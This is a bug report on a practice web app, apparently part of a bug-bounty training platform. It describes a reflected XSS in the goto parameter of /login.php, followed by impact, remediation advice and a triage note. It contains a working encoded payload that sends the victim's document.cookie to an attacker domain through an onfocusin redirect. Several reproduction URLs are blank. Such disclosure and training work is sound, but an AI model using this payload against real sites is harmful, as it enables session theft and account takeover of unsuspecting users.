FirstBlood-#927Reflected XSS at /login.php using goto patameter leads to Account Takeover
This issue was discovered on FirstBlood v2

On 2021-10-30, mrrootsec Level 2 reported:

Hello Zseano, Hope you are doing well.

Description :

Upon analyzing the application behavior at /login.php goto parameter.if the user is logged in attacker can takeover the account by constructing the payload breaking out some HTML Tags.

Steps to Reproduce the issue:

  1. Navigate to

  2. Login with valid doctor credentials and add this payload after the URL


  3. Final URL with payload`${document.cookie}`%22%3E

  4. If a user visit above URL,The Cookies of this user gets redirected to the attacker domain.

Impact :

  1. As an attacker i can steal of user session cookies and an administrative account cookie, the attacker can gain administrative access to the entire application. Sometimes this vulnerability can leads to Credential theft and Sensitive Data Leakage.

Remediation / Fix :

  1. Implement Input Validation Input validation is the process of ensuring that a web application returns only trusted and proper data in order to prevent malicious data from entering the system and causing harm to the site, users, and database.

  2. Set the HTTPOnly flag of your session cookie and other custom cookies you may have that are not accessed by any JavaScript code.

  3. Another great way of mitigating the impact of an XSS flaw can be implementing a robust content security policy

  4. Use Security Headers Set the X-XSS protection header to “X-XSS-Protection: 0” to disable the XSS Auditor, preventing it from taking the default browser to handle responses.

References :


Thanks and Regards - MOHAMMAD SAQLAIN

P3 Medium

Endpoint: /login.php

Parameter: ?goto

Payload: hackevent%22%20autofocus%20onfocusin=%22window.location.href=`${document.cookie}`%22%3E

FirstBlood ID: 26
Vulnerability Type: Reflective XSS

The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (ID 39), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.